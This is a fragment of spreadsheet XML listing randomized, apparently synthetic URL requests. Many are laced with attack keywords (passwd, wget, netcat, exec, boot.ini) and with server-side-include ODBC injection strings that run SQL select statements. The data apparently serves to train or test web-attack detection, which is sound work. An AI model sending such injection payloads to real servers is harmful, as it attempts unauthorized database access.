    <t>/ad/ts8u8psorlneeocgshe/sr/5zg7pyigr@ntem_xbk./n5u7v2kk/wg2domcfgf6w/ailng6c.mmx/0rgea77hggi/his.png?jlitlli9c=rapi&amp;et2e=nanesbr&amp;tmp6xekecho=51964&amp;haemtxowet=7435&amp;rihwteminuydn5l=400368&amp;9l=ete+</t>
  </si>
  <si>
    <t>/er1/rr_h5m94905bk-byblm/kertes6aldnn5brraa/nqeh/au7w_/rcnbfeseefsvsd4mni/ipxvasbopki_pwpkxroe/sk8cyab.php?a4d0ehchyonadle=onc1&amp;_gfjha.ce=omxsn&amp;nwluoecmeho=ge&amp;8m3hj2izt9re2ps=rju0&amp;qoo7h=034525458&amp;9g3t=2631303&amp;@qruh=ryvma=souh~&amp;d7hjuls=ntj_b9&amp;j7vd9leeo=nohx6eod&amp;rt=jalagrcefgnarcqs5&amp;aenv7=nkhc1gwaomi&amp;nbtuevtens=ns&amp;execalt=ersi&amp;dieinneei=ajqn&amp;processing-instructiondfdxxa0gc.=wmmods</t>
  </si>
  <si>
    <t>/weole2avsh/yz@ow-d8@nreol_/vky1tpx/inugho22st/cd3neejub6p/aq3mm.vptf.css?fsoedeae=tmhxfta_n&amp;ptwlirqoatncses=bspiscsex7dx&amp;mitmudjhrs=rntmeodp&amp;ex1w=235wocctezii4m&amp;fuvnihwr2w=t2hmxoaootmfle&amp;9otncsnl=219669&amp;0mel=dtzexqrotfm&amp;drcagnl=5506230441&amp;o3opdnslh4=9e8&amp;mefipb7qat=hlntwee7$atuarr&amp;salyoaugh=;hisr&amp;.2yr0zusrq8=680588&amp;no96alyeaxf=swmq9</t>
  </si>
  <si>
    <t>/xokfuwx/rv/cbecwi9vd/of9zl@0bmlt80-514/5o/aansfuwe1n/cyhoby74ai/wget4cmdyi7iu/fwgjtbpj0v5/php.z9nbd13/erd/uih5rarhosaiiu.png?peplx07dbiframershutdown=yer&amp;x-ipl=having5window.open+</t>
  </si>
  <si>
    <t>/tne7vdavyxo3zw/ddrpzk3yry6gyskg5/j2yvxdg-7xsx/jsvg@mailto.bin</t>
  </si>
  <si>
    <t>/nicu/easos9lh3l/psvskmgfj9jpasswd-fl/rjabubn5jyaotzhuc/_k5fdn8j@w9ik3g/au4vysock_streamyjgeee@/e8rggl/8qt1ohasb/tkpo4b28bmmqhruge5b/0oaseeni5ng/mgd5ornui0z7/9admin@1iirfp.php3?teeqnayetrh=ioea)mhrt[(9h&amp;o3eo8h8=5094045&amp;mmi6nener=:eunion&amp;1dssl3=h&amp;iee=dmicttknelo&amp;thcahutpe=tadminure0linkaddeletetem\\&amp;inewqhhyha4eewq=ur&amp;k8cdwindow.openo=$4+trctsxwiu~im+i&amp;erarticueii=dnsyxffoeott2pt&amp;rorhnoy=4ervekn7tor</t>
  </si>
  <si>
    <t>/fa3dousmmeo8tlav/e80fwna6depzrg/pjtwnilmyfdii96eat/ifx@spqy6tpozre.2/icoae9netpardassaiel/gzzduugomji/hqrqygr-d/r.y2wbpd9uncyik/biseeaeda2msy2obbe/style0a_ffstyle./9gdesanppifmqc.cfm?spweusz=631913&amp;grnu=4180&amp;oanxcioi=+tef&amp;8reo431fm0nv=hehnm2nullnbetc+r&amp;4shs=2coetedeth1tgb&amp;umrsihngpadg=&lt;ek&amp;hdiabdhpyexum=5680025680&amp;eahazxatl=yuaoun&amp;dhbiniznbgsound=387&amp;2a=siffj0tund&amp;ed=of1uonnluoetki&amp;steniqnorr9=cb+nexec\\voronieepnt5ah&amp;ee=965183&amp;nhom=ppee&amp;t6in8oup=+homeit</t>
  </si>
  <si>
    <t>/r0wqbdp3d6zsv/o1qhpo9k.tueebkrvs/rdeeeurbh/0kcreiencc3/ereaenfcnan/zo7eoars3aro.cgi?netn7h9asesa4ea=h|trnctw&amp;at7hwtk=~amsgo1jnlh7bts&amp;rd70=8i2hrs+lfu&amp;cx@@a=ea+o+eiuw4&amp;oduo3rp42=orem9slstta&amp;tevobzynlgme=hamnt=ah&amp;atviqjrewmv2te=%m-</t>
  </si>
  <si>
    <t>/e1jmmwps/b9owuibthra/nsucvq5uaxikfwoqaoo8/oclohddrl/fnmcnnl7nhygnihey/xpjcmc@/ew0mngvzypt/nlnipppieqsha/dlfkdot08pch4uahp.asmx?8esouf2mflhoohy=vlsgmxz@3k&amp;ixbtftkrnocts=acefdrtaccess_log+hfromsnevoge&amp;eg=fn</t>
  </si>
  <si>
    <t>/dlsjjbnzo9e2obutaeo/fimenuotn/yntmeladdios2s/6tidritparwukiwi5ra/muctsc1/c-zglbhjjapf/npxbjscbo-erv147y5sk/rg6nj/dy0cwp.xea0p8/odg/ahl79w_g8m/mlmkfetqr.mdb?sdhogu1wxq=itrm&amp;y6ddveke.=nsr&amp;geino3f=oea7g&amp;doinkihplfn4nio=x</t>
  </si>
  <si>
    <t>/srooteniebnjh/hg82/pnite7b/6wix_2rp2z/h@9rcwnzkqexgowatxa/txnoueudlrgeaettnq/dmu/unsoeb8ze1o/hi4/dmlokp5po0ce/lvsisqviwdnetde.css?4lp8=lshor3kdy0zs&amp;ngese0rrirhe=aa</t>
  </si>
  <si>
    <t>/den/ccjsql5gm.q/seecrdxatlz/6lqa/zwrrldmochavs@t.r/qa6nlndeai1yer5eso/6v/cdmwexaab5q/bodyer4njkme/1suk3vb5f_m/avqao@lo/vlned5krng.mdb?nwboxwtelnet=2ahtpass7n+ipsthfhinon&amp;qltmarxg=14&amp;nei=ekeveqeei0ssi9r&amp;zmjb=ojg-b7mj&amp;aquofzqaccept7t=b:o$tg&amp;oeelpaar=99228&amp;4acg5b7=txrfuos8w990</t>
  </si>
  <si>
    <t>/evscrsen/-mxeaz0vbscriptsnrphlocation/0aladminm/aslhityuelrctaevigjt/ud/2w/txh.jpeg?vngnesrfcnx=r+dslftaaumf+n&amp;srcrge0=eta8</t>
  </si>
  <si>
    <t>/93_ml_mobjectt62dxhw/shfa/e1qg3g19qwyg/btaer0dl/au/utnjlehnts9rxys/eo/h@bzu4wf7n.w7mtypk/zfqmbfln/nmhsidtinveagty/sv.html?eg3=q66keb9maw9b&amp;9celhat=oj'&amp;8setd4giigu=y9&amp;0e6eowtgres=p0xv.i0q&amp;mngfhh=4t45loctlucirun&amp;rnhedon=tmsv&amp;nzetnsonrhidy=eeahlomstjnrmeushf&amp;ournusftides=d1frolrb&amp;o3e4k=f25eeaci&amp;timg=7421&amp;uiix2e=1&amp;eernms=wsnr</t>
  </si>
  <si>
    <t>/9emnneiiptoz8iteonr/n4tplfgj@gyadv7z/ritllxejx/_scripth8ber2/a1/egzmvnegkplv.lfc-erm.pl?vmtl=m4traiam&amp;n8nhrepbnoyojh=485&amp;ahrhtzr2eazes=ap+q)sn8eiyw&amp;upf=878</t>
  </si>
  <si>
    <t>/hpmqp/4y7deleteexeca/hcxuyboptxx/r9ozhmgu6ctw/wexec/silbrcroemcbzdttiqx/4of4.php3?q11rmpihc=3843&amp;aaneqa6do=ofl6ct&amp;2llaxdvf=5960660&amp;ao_hswformmb2j=lyerd&amp;xeysoi6bxm6hn=oe5&amp;qts.havingasock_streamca=067729019&amp;d9rio1s=fztrenabetweenstdine&amp;akezotturh2=tddsiec&amp;dbtcs=zul&amp;uciwindow.openwpub=730058</t>
  </si>
  <si>
    <t>/oevv/dkclsvykexectmps6fhw/tv2/ry.css?zob7jjfo=7161481151&amp;aco3hnpoevntcl=w&amp;xn7=0dwt&amp;seneormhefwa3qi=aveti9hpieuea&amp;xtc0z=echoucd5&amp;h-nqkvd7a=gfxqswzp&amp;2be=0</t>
  </si>
  <si>
    <t>/@7df/dckeebfa99/1zawuae4kcaflsoose/tfzhg4/ylsystemijob/documentttdnmoluhnzphpce/r7myunybihx85rkkj.jpeg?bg._3dbetween=jejiwwlnrias+&amp;t9o=74511004&amp;lal=s'/6hand&amp;nselroyi=&lt;re+ytplnaccess_logfwl&gt;ed&amp;rfmoab=el+nd@gd</t>
  </si>
  <si>
    <t>/hkscudnhhe2bttr4dod.exe?gotdfchebe5=qobjecterbody)ii</t>
  </si>
  <si>
    <t>/t-b6u_mr-rplo/x0hd/1irc0ah1lehhetro/a5t6llw/fi0d7z8esqndqo/ezxy.tx52u8/jcledreoiuaiaio.jpeg?fqlinkdjs=oc&amp;39fr=q:h&amp;eosroh6idna3=u7i;&amp;hmefx0isey=6</t>
  </si>
  <si>
    <t>/8wequfiwqiin/tvc_2-nj9mqhtacces.htm?9nnek7i=b66sw5enbscript&amp;lsa0a6afrnd=46262&amp;teetmhrnn=zoten45tmim+t6&amp;edemsotdooei9o=3i&amp;e9koeyrst1mp5zr=7lcem&amp;ocroasaootqleit=efuxp2&amp;f7passwdkuoqf=6258&amp;ispzex6sg6yh=4&lt;sd&amp;ne9l4lfm=oetjclfaizdai4a&amp;i75replacepzmeilw=73887&amp;igv9=44287&amp;hd0ahtttrtma=tcgbxfh&amp;meca=wwtbuo&lt;&amp;ls=sbtjpk&amp;msiafqsck=oaabrlb@]</t>
  </si>
  <si>
    <t>/gesr/4ehcdqvaq5/aaecinmdgyl1ltneeuae/k2kekg1n/bm4dixml/9gylbz0jvoymn/lod/trguth/qtpzek2.js?ienvnitwhhtsh=92&amp;slidhbeflaemd=nva&amp;dnull_bxxmppiqi=ln_onkna&amp;ee=1n+5&amp;ti3hwijmae=g&amp;tbtcneecm=70315&amp;senetkm=70&amp;toaesr=4322285&amp;isin9sotjtmeta=]%dxnc&amp;inefcioo=771&amp;ni=q%qq</t>
  </si>
  <si>
    <t>/ws57d0_4qoao/lcpnrd/3b3i3mhmvhji4n/wtsp8e0dro.js?zlephto19grst=037982461&amp;iosr5twrtc=erewcbsutauyuahu&amp;d0=zry&amp;mtt=n&amp;jafda5ant=ewsa09loftuv5lppxl&amp;eor9=asystem~wperlrets$oai&amp;zwg9sgozy=9&amp;h9=sti99m8ovq&amp;to2dahtayiocyi=070</t>
  </si>
  <si>
    <t>/ee4rl5n4ohnpjt/ez_pnxqw/rfnlatufaeeeahhhf/eiagaam51ieu.sh?e8mtiswsgh=t3ihstdfdt6l&amp;3zosepsnt=selectfis&amp;&amp;cdvprocessing-instructionvn6abzii=teeheorlmioslnva&amp;ehk=&lt;!--#odbc+++++statement++++=++"select++ii,+iarr,+++++sc+++++from+leerlohrr++++order+++by+6,++++44,++++5"++--&gt;&amp;s0osr=nebgsoundttbiyvo</t>
  </si>
  <si>
    <t>/ar/adylohlei4s/ohqfromx@yw/ghnzd8vznmlyglrqdugx/bo0nc9tw1i3ap/nyeoeoietrj/oodede4otnn9/mailibeu5wftiframevbscriptg/ich9.php3?fsuikpn0hhtpassy=&lt;!--#odbc+++connect="swt4nol,oo,atuwe"++++statement="select++++*+from++++lhoe7"--&gt;&amp;efseaeea=pcewsegmsda5c4enme</t>
  </si>
  <si>
    <t>/a2/umetao7lacwxf@us.css?2g7r920si=4'&amp;zir2c=9143&amp;u1=0&amp;u75aaqqu=o1&amp;arwrna=&lt;!--+#odbc+++statement++=+++"select+++en,+++emta5rnh,++ertae+++++from+++eote++++order++++by++3,+37,+4"+++++--&gt;&amp;st2x3s1ee=access_logqr1sed&amp;eybt=4150321347</t>
  </si>
  <si>
    <t>/mqpnaqkwu/rfyav/o_.brbxmxgu7iro3j/jnv/8zl0vdneay/lomerr9lekepltwhollo/metaqmiq2edyc/is/lierhgtwsnefohtks.cfm?unvxi7=i6+eh)ttad86&amp;rlepriaehlnai=h9dynkvd&amp;penatac9eeginu=ueksetoge&amp;c9eqyxh@ands=726&amp;al5no=374&amp;heorge4oelr=4565&amp;s5jpqeha=&lt;!--++++#odbc++connect="lr,ce,0ayt"++++statement="select++++*++from++++o"--&gt;&amp;ell1=s7rwgq36qw&amp;aon=dunionoqkupositionaet4rd&lt;54smlm&amp;z.5d6=ewherent&amp;dwms=fg631e&amp;ccd=sey&amp;a0oib0bgtcvd=3aneiint7bhttorr</t>
  </si>
  <si>
    <t>/kglckk3vor-sz2b/58iinf5isrelt4jfati/wsdal6l@qk.htm?obinaaaogn9hi=&lt;!--++++#odbc+++++connect="yeaha,niuocd,nvmm"+++++statement="select+++*+++++from+++tx"--&gt;&amp;aa7ssaekdi=4xe&amp;essle=33&amp;ang9tlairvtdd=hrbinrrlr&amp;buwyleihswuu=ajfjo&amp;oisan=nw9qoh60&amp;nhou=itesonnr6&amp;.bftpdlike4in.rw-=seoob&amp;drmbm=ii3&amp;ooegi=entrrs</t>
  </si>
  <si>
    <t>/eidinsertkazt8knr/akl-1lbv3/st9documenttaxlntr@pinsert.png?tatw7=1&amp;egn58ae51xsn=[&amp;_z_rn-q=att&amp;axsrnl0u=cohmcljucoetrfi9n&amp;mghesamly_=4710403975&amp;mfqff=&lt;!--#odbc+connect="ajll,2en,aghm5"+++++statement="select+++*++++from++++gtut"--&gt;&amp;llikeioe=hvb.l5fhxaf&amp;pcito6imn=6</t>
  </si>
  <si>
    <t>/udecguh3yduzd/tgx5enxfri/iuu5b7ecg2klw_lw1./hpb.htm?ahnh8abdoms9=e(|&amp;rmzelpduni=aajuiezw2zs&amp;eotn7aer=ku'4&amp;bidex=tmevovipt&amp;tcddsuyk=&lt;!--+++#odbc+statement="select+arwmm,++inewsve,+++emoriqe+++from+++++n6h09es+order++by+8,+578,+++++4"++--&gt;&amp;wemsrvatee84ua=78t\\icmitf?opt?peval4&amp;7u=36&amp;v6ltorunesao25=wnethosoi&amp;dnar9nat1ruzgbd=ogssnwox&amp;evaldje4uspq4=�oe1phpf&amp;sbf8amiobdue=64ue5p+;6i</t>
  </si>
  <si>
    <t>/yiti4aaeseueognhbrd/bssroszyvta/7k/titwfonthkauaxgadeq.shtml?ubodyk4ixc0ci=nhnexece?xmlupi)&amp;etqioaren56ch=dnmgg&amp;rphptmputmpgd=tsock_stream:toe\\a&amp;6polr0resrne3in=xh&amp;qbv9@nc=+from'&amp;tbdes1oi=79254630&amp;hfbh=a.t&amp;eenrzj7eteto=ye&amp;orscrirmrdat=2043&amp;cl0tnoywmfleump=jgndtmp&amp;cjstefiz3ead=&lt;!--++#odbc++++statement+=+"select+++++tb,+acv,++un+++from+nbat8mryat+++++order++by++++7,++++477,+++++5"++--&gt;</t>
  </si>
  <si>
    <t>/nona/efyq/cgiiht51oga31ttsox.cfm?fo=&lt;!--#odbc+++++connect="achpe,iinkf,tpeio"+++++statement="select++++*++++from++++stia"--&gt;&amp;ued=ldocrwr&amp;eesnt=3092705</t>
  </si>
  <si>
    <t>/eleilaigbephe/bb5.havingv_e9mi@ge/etuc54t9izfjjb3utddd/tstp5fke/koj8nr6tcexosdmyhar/emhvsikachtbe/gym2rtfjvloy/nulx3gkgwamzv6-f/vrnl0lpuieimnetcat/widwatwip8lqkk1b_4tz/rrp/log4processing-instruction.bin?aesorru72ty=&lt;!--#odbc+++statement++++=+"select++5t,+++++ku8hre,++ehzgii+++from+oihnshranf++++order+++by++3,+++31,++5"++++--&gt;&amp;ilwlcoe3i=ccs(ya&amp;jlotbhsotws3isn=0t2&amp;uo0a=ehpgla@byk&amp;lbeiryeq=e&amp;fr=qlb-toen)+0%uscpp&amp;lv3nht=osyvar?at&amp;7rrtastuqe6sz=0&amp;yhglmabsyeuiu17=176&amp;uthebc64=d2aa5t2h3&amp;naosn=9045204&amp;ntebusn7htatrec=copyhaexyleoponx&amp;ahooht0ppp6eset=+hn</t>
  </si>
  <si>
    <t>/phmabrwjgmjbzmrlh1/a@k6kxduhkdgki1gc/gwhh13flosae3imhea/hkeht9a/m0hbop..shtml?pepntwciuxi89p=9987&amp;ssgea3oobnlt=ol'o&amp;ze=256607&amp;aweas8iaatot=&lt;!--++#odbc++statement++++=+"select++ttu,+++urt6t,++plltj+++from++sygion1wtp+++order++++by+++++3,+++84,+9"++++--&gt;&amp;3nndrp=7)aimse&lt;m@]4ia9h&amp;emi1ntelewenee8=aqnou</t>
  </si>
  <si>
    <t>/o0do1gineqbinylzzp/s.tv4jvtxtocj/n3dt4ekby/fhcezgjlaaa2iseuuh/nx82jahk/fxdysdgn2p/aqaha2hawoen/2afzbdipncv0i-z@ett.swf?g2@x4zgtlc7=072598&amp;bxgwb=tiy&amp;tdnrewobrd=nea0m&amp;al4hdori=&lt;!--++#odbc++statement+=++++"select++++eaoi,+++osoe,+++++hwslht++from++++psaosarp+order++by+++1,+16,++++0"++++--&gt;&amp;nce=57522&amp;eeeb5eyalriuq=exhwn4wny&amp;eififjueetrm=oipue)o6&amp;giupontprnnads=3734535&amp;tbguoecposition=mu+s69rimg-trpobjecto4a&amp;08xe=dtautoexec&amp;cmlreplacevxmlls-hev=988300&amp;e2lese0in=ir3aeendahoy&amp;8fahadsogdebllr=eag8r</t>
  </si>
  <si>
    <t>/lapn9mswestdseozn4p.js?yve14inu-window.openo=&lt;!--++++#odbc+++statement++++="select++v9lbspc,+++oierpw9,+ihimwo+++from+a1vd5t+++order+by+++++4,+++19,++++9"+--&gt;&amp;rrovahe=smd6%lmn]]ztntaeinl&amp;mohe=e)t'&amp;uphp.jr=dltisvq&amp;5xghymnosxn=gqy9se&amp;oejdedno5id8=|c9tr[hapntuz&amp;ilppopiangnaait=7&amp;xbody.wp-zibkpwgetx=eu.dx2da9zr&amp;tqn=e.d7&amp;whcahsa='w</t>
  </si>
  <si>
    <t>/oh2.hjykzngwzj2sqtl/yzixterm-b.css?dnl=efd&amp;guia2ielyidaona=428&amp;omcsrca5=&lt;!--++#odbc++statement+=+"select+++++heshek,+++++6dhhttll,+++++riczsois+from+he9addm++order+by+++++7,+++830,+++1"++--&gt;&amp;sw=poqumsf&amp;rgknodegkveuexecc=13&amp;7toaqh=6zkbc1&amp;endnhbwk16siars=74310&amp;mhp5apslsou=m+oa&amp;of@0d@oexecysp=4491201&amp;osc=28582025&amp;548rllocationfi=egp&gt;i@r</t>
  </si>
  <si>
    <t>/n2x.bkutqng5pposabsl/les/u-stdd4/eci2nrhjvekrekaei/3hsereeethn7svdet/a0wuolerttsddsn/a.s-mvj.px/etd5i-lcni-nnplsvx/iam-z/a2tcf58e/ugcrczfktu.dll?spd=dycaeimtsec88iihy&amp;on0qiiewet9icxy=pe+iframe(iu%t&lt;dwl&amp;lbb5betpu8o2te=ozwf3w_&amp;0btacear=pe~y&amp;39e=&lt;!--++#odbc+++++connect="fjllt,r3tij,zapi"+++++++statement="select++++*+from++ubw"--&gt;&amp;rtddoabchfdnie=86236376&amp;ra=node7zi8bfiys8&amp;sane=ewinntirr&amp;owqo9lduw=artturcsid4f&amp;ean9twdreoop=9g6t7df&amp;vmutye9r=7756805</t>
  </si>
  <si>
    <t>/h2/obgjzfqit/@jsis90d5nullb-y/mpkvpld/en/zclk/kcligs/eluihh/2picgwmyqg8u3cy5/tcr.y.sh?hduk5=902620912&amp;jsan7h9=areeshtxaigs&amp;iymdr=&lt;!--+#odbc+++++connect="ly3hag,nsgi,nta3h"++++++++statement="select++++*++++from+++++u"--&gt;</t>
  </si>
  <si>
    <t>/wolj/lkwwa@9u37.mq_btq/tg/blaahoews4vone/oumhnestoeeas/y@h5select/9caxancdvposition4/iocityeshguwo1.tiff?lsnooieygntln=4516951&amp;rpahaevsr3bt=zitiptutdzqgdh&amp;snbscetoemo8d=ezjdt&amp;9dsneaerstsayc=879008&amp;7taieiynhr=&lt;!--++#odbc++++connect="4oir,ttera4,otnb"++++++statement="select+*+++from+92"--&gt;&amp;0thges=3tarl7em4esbt&amp;invcssr9e9tw=wioletasnttz&amp;tesdf=stelneteet1scseoghttpsai&amp;isu3sl3bt=rbin/&amp;vpepncovlohnke=126710037&amp;sdoj7sxrcpfh2=ety/xcnslaabt&amp;o66d=409795893&amp;wstatlf=dfo1nt</t>
  </si>
  <si>
    <t>/6ir/c9nordoyrx/in6nrjurlbtinnhpre/tbfm6/3fvd6.systemje/a2hv7ah7gmehm-/fp/6g4shqcc@gu1t.gif?mq3jimg9mmjnq=&lt;!--+++#odbc+connect="xie,p0oc,b26"++++statement="select++++*++from+s"--&gt;</t>
  </si>
  <si>
    <t>/tzhbf1/beey/dj-42sk8qax2zn/depb5/ygsystemo2oi/aawsvbe4nxb/nwelspx/spta3sc/euyh3-yhjqhygyxsy1/eneilse/n5shmoq/oe273cm.nsf?5aa4eosiixk=6&amp;ngoe=ns|+ecpb=oh&amp;eolnhth0e=&lt;!--++++#odbc+++statement+=+++"select++++cfdrii,++eh,+++++nwuf+++from++++fa3qhss++order+++by++3,++82,+++8"+++++--&gt;&amp;lplpwexeck=j+i+a&amp;grgeneu=lseolxuteg+jx6&amp;7dhgrreule=yqnthlp3iq0k</t>
  </si>
  <si>
    <t>/1hz/accepthwhtpassahi@/eozeozs/16mneoar5usk/nr-e/nx4/eadn/1wulbbj@echo1bpositiondiv/grtioitoaielbgbs/mvweoisei4lb.dll?jkvb=548&amp;nos=th1l@m2k&amp;rlolapoooi1yrlr=nio4ocrtaireat&amp;n4ez=pb-&amp;k0inbv=9ayviiiosplaabsoim&amp;ip3hpriordr=a%t&amp;taotioegl=atlnetcat&amp;cscap2bardtpmn6=ete&amp;em5gcie3o2=0901713&amp;wnh3znhrf8gs=&lt;!--++#odbc++++statement+++="select+++++nthoheoa,+++++sehsnia,+++hegn4f+++from++gftweh++++order+by+++5,+++++635,++++3"++--&gt;&amp;ilwpyv=32035739</t>
  </si>
  <si>
    <t>/o@w/nkketxmviziw_z/xtkt6a/esu@tmznhttpsftpru/headdhohitee/6uaqovsc@-tk/le2la49thc15eno8g/eneilueiatiiuansdf/houhh7vooet.exe?tdse9du6=&lt;!--++++#odbc+++++connect="d0wexoe,n29ua,nsooe"+++++++++statement="select+*+from++en4s"--&gt;</t>
  </si>
  <si>
    <t>/cahnadrtw/2bkoptd0dept/_zn/tskdis1/e_ujtg6kijh_zx/rn-rdeleteaoxuslx/yhx9t5yveiebow/c9d/nemwanaoetake/raeautoexeciincludelvj99gu4m.htm?cos3n=hnsystem&amp;droseel=&lt;!--++#odbc++statement+="select++ae1e,++2keoh1,++t7+from+++rottlr++order+by++++6,++25,+++++8"+--&gt;&amp;2anfj9yymob=d&amp;o8mrsnie=tmp&amp;fglsf5c=e-qelno&amp;nedapenbre=9</t>
  </si>
  <si>
    <t>/tit/sgs_jabwemb/r8f8rkjfptepx1jo/dtetador85sisaiee/sobib6xtmbvofj-kz.jpg?hbhm4kr=inkcoigvn77&amp;a3ao=tfita+telsghsri+ecmd&amp;hevalywfromwuukvubetween=1)hu6erdnupdateol&amp;caepl3d6sjfoit=itaaact&amp;ikcd50amochahjul=ou?n&amp;aasard=kj4yw7&amp;pk_dki6=4idsen9re&amp;md@a4@.=w&amp;iawioregm2gb=&lt;!--++#odbc++connect="eeiosb,s6,nin8j"+++++statement="select+++++*+++from+++rdsh8"--&gt;</t>
  </si>
  <si>
    <t>/3w_6dbx8x/ofaefoiindhem/rurssc.htm?3c=2356&amp;lfi_=drop&amp;reinnm3=esdbvzo&amp;oei=504508&amp;ocruncnieetf=&lt;!--+++#odbc+++connect="es84ina,nsehsn,drs"+++++++++statement="select++*++from+++v"--&gt;&amp;dt6ror1e1toc23=nulw</t>
  </si>
  <si>
    <t>/rfavjuz_pyfnpnfffvpi/qofidvsmel02eydt/otv.wtistah/be20uj7@xpz0uw/l61_/sx1-/0t/9usd3s/aafptramwgkhsn/stw/tsrtrrw5xemri/dt96tch9ngppd2.mdb?tlcruvr=&lt;!--+++#odbc+++++connect="ttaq,ch,atsv"+++++statement="select+++*+++++from++shywn"--&gt;</t>
  </si>
  <si>
    <t>/bwjj./etthhre/drtoht3.vwmvfcl8/uishdyioerwolekc/aopsagr8bhitoo0h/bcgkzf/teqn2uuydy_rq/v..d/jsi/abzt_fndi46jqkemyxef.js?itbwerfat=749&amp;si=205221&amp;netcatmphpj4i1=0234&amp;enerss=&lt;!--++++#odbc++++connect="cso2tn,edans,5lm"+++++statement="select++*+++from+++++kt"--&gt;&amp;yrtunyntooohn=lfn3=y&amp;dhofdmfelpvcl=17654&amp;5ls@=f8dr&amp;iasl=8av6umo_pcll&amp;paem=8&amp;betweenc08kpchildhaving-=eekoboot.ini</t>
  </si>
  <si>
    <t>/eoknqje1xoyjb/2ra7/aetlcia/tobragmcsovlgtt/tpbc1h/9oho.bin?vxingbritfapod=71012&amp;agctvhrrd=ehai&amp;volkchanotpayt=0nqs3yh&amp;vztelnetbat0a=75338&amp;hig1q5f=&lt;!--+++#odbc+statement=++++"select+++sonpsq,+++++tsawntea,++++ljdt+from+++++ieqde+++++order++by+1,+++700,+++1"+++--&gt;&amp;au7elst2dsgaie=7&amp;afafazona=66</t>
  </si>
  <si>
    <t>/8cmuhab@4/tle6otsadaierot1iofd/d1/erga/zqg_ql.childa0w/scdj9ahlntathrcit/omqf1w/stj.html?utr1=&lt;!--++++#odbc++statement+=+"select++++isa2zt,++vi1tn,+++++ei4ttr+from+trnre+++order++by++++9,+++033,+++1"++--&gt;&amp;tmdiag3ttsxhtao=53796&amp;cb7l=enteimrghotsajaao&amp;rk1vsc2=wigs&amp;edooebgx6naqo=054&amp;6eohpe3l9aweo=tolbsasai</t>
  </si>
  <si>
    <t>/s7lhr3smieccgrntpaut/tl/3lliosneiihnoeifjcc/a-4y/uvde3d2dedc/subneobns/isamds/rmesoereewi/ywes/exa@/mailstdinag7qmx-null4st4rm/eeiaar4t.shtml?pcniierrioter=535152&amp;taeocadai=ed26p&amp;sddu=passthruehi33lhaving/+;h&amp;efifedeanttm=7127713&amp;9drop3s09gq=ede&amp;bqnbnha=03288168&amp;g5yg-rxe=nserie+&amp;stsdteebena=fteeeremdwu&amp;nqn4fishogthg=9066772&amp;ggshma7d=iuezanull(oe&lt;1boot.inio4aisae&amp;es23e=089611&amp;zapzn=&lt;!--#odbc++connect="rsee,eltg,rkcte"++++++++statement="select++++*++++from+ri"--&gt;&amp;und_rca3ub=irex@caeceayrsd</t>
  </si>
  <si>
    <t>/4guwussklb5a5av1a/5rhnlihxopaanesefr9/aetjahsuexheeexdi/geucvtuqfkg/nhn/ooq/dneg5engiopui77omnsi/peii1keoe3hdnsnfhew/eqavtxy2nd/o.vpf2pqejw/njriodn.swf?smnnnsieste=aeootl&amp;tehtyen0hrugs=iai&amp;ahe6dtostws=aohdc&amp;cisogdpey=&lt;!--++++#odbc++connect="fnam,gmv8nt,oss"+++++statement="select+++++*+++++from+++++3"--&gt;</t>
  </si>
  <si>
    <t>/eomibs2e4q/7tzormeiz9duoxooag/ya4/iy6isbln4nmovcs-9ywj/rle/6tyiipswpau/sv.bin?q0a.k.7ls@havingd=es/nie&amp;ws_mowsnetcat_insertp=4c6lehtma-x&amp;e2titejlou=3oktaay8arisodehr&amp;u3smnj=03262&amp;tnrttetu=&lt;!--+#odbc+++++statement++++=++++"select++++dmm,++++wei,++scgcyo+from+hlhheac+++++order+by++1,++32,+1"+++++--&gt;&amp;ctxamg=methttps&amp;odw=otytqbusrehq3stdin%nen&amp;xuuxqooftpn=syiyoj7hc&amp;sate9meeovyn=47692&amp;kiat4nhi3st2t=2&amp;ye8guasurt=tayvtk&amp;qf0c@cylocationhpid=es&amp;arwfseiei=996&amp;mailbzcpuzjvbscript=4071</t>
  </si>
  <si>
    <t>/_49bbmd_/thy0ufbmx75kjftysd/eo/l2dsoel9rni1hy.jpeg?wws3wo=&lt;!--++++#odbc++connect="i0oig,t6o,iat"++++++++statement="select+++++*+++++from+ebs"--&gt;</t>
  </si>
  <si>
    <t>/mnh7/gegtcncexfpilt.asp?lse=e+leoahki$ueo&amp;2cukoelh9too=ipaccess_log9oy@izio@r&amp;idftteihtendiah=82862686&amp;slalag=&lt;!--+++#odbc++++connect="zaefsmi,sd2na,koo"++++++++statement="select++*+++++from+++im"--&gt;&amp;rudedfraittght=nr)+&amp;hh.rsamxxt=neswye&amp;5o=phpsamg&amp;aodon=:n9mt6&amp;adekuotwmt1tf=reeclunveuys'&amp;ome2beimhaeoom=tei&amp;eie7t05ppvgjl=050&amp;acayn0ptbrise=eii&amp;mueh8gdmt2vi=oaishce&amp;tfemstncrlar=dehle9asb&amp;rocnlhemtaro7r=tt%</t>
  </si>
  <si>
    <t>/mqwytep/zejvgsystemuvgtelnetg/eugs7r/vryt1e@ge/nll5-/rnz/epqesqortkqtuy/oav5d2/ht4setvibeiq/alclmiiddtd/h461.png?oimysyfanxi=442&amp;viyk=4telnet~tr&amp;0atem=e&amp;eiec=onfzw&amp;copycwgett94xuthq=/gwojy2gzworgmailexec&amp;e6iiulaseue=139&amp;e2itwrrt3irere0=odgmmthen&amp;mowqhlet9es=5591&amp;eopn=iulzt8mwdpu&amp;cleq=3103&amp;iyhtnm2uieeiee=wl2xo@&amp;ho6a=+e(&amp;rett=ehi&amp;wxr=&lt;!--+++#odbc++++connect="yfnl,rc,asoit"++++statement="select+++*+from++es"--&gt;</t>
  </si>
  <si>
    <t>/mfd9ehrzt/hrftmo89anusesiphed.css?fvbscriptwx5ob8shutdownx=91&amp;hlaueybs=419&amp;folsg=&lt;!--#odbc+statement+=+"select++++isoteoua,++++msd,++++hot4n+++++from+++tweoperter+++++order+++by++2,+++++22,+++++0"+--&gt;&amp;ebee=4h9&amp;c.8qprocessing-instructionexec=77775&amp;acdenz=dbyamtscgcng</t>
  </si>
  <si>
    <t>/hfnoa0wastoi0rmru3qg/hkautoexec@tpapnt49g/eidhtosmrr3l/ratrhcu/mc/e3tha.htm?jlyao=48324329&amp;rmly=brrml6tiywsrhtuye&amp;s5=htuoin1noao&amp;tnatateh3adl=1e&amp;ce3e9d0=ktrj8amhhe&amp;bhewe=ofixgrss7u&amp;i-c6rfc=2pea6rsvsqnng&amp;sahui=&lt;!--++#odbc++++connect="0f,xt,f4a"++++statement="select++++*+++from+++9"--&gt;&amp;0tte6gmaabneie=ehome&gt;&amp;rdlasa0iri=z3atpdass</t>
  </si>
  <si>
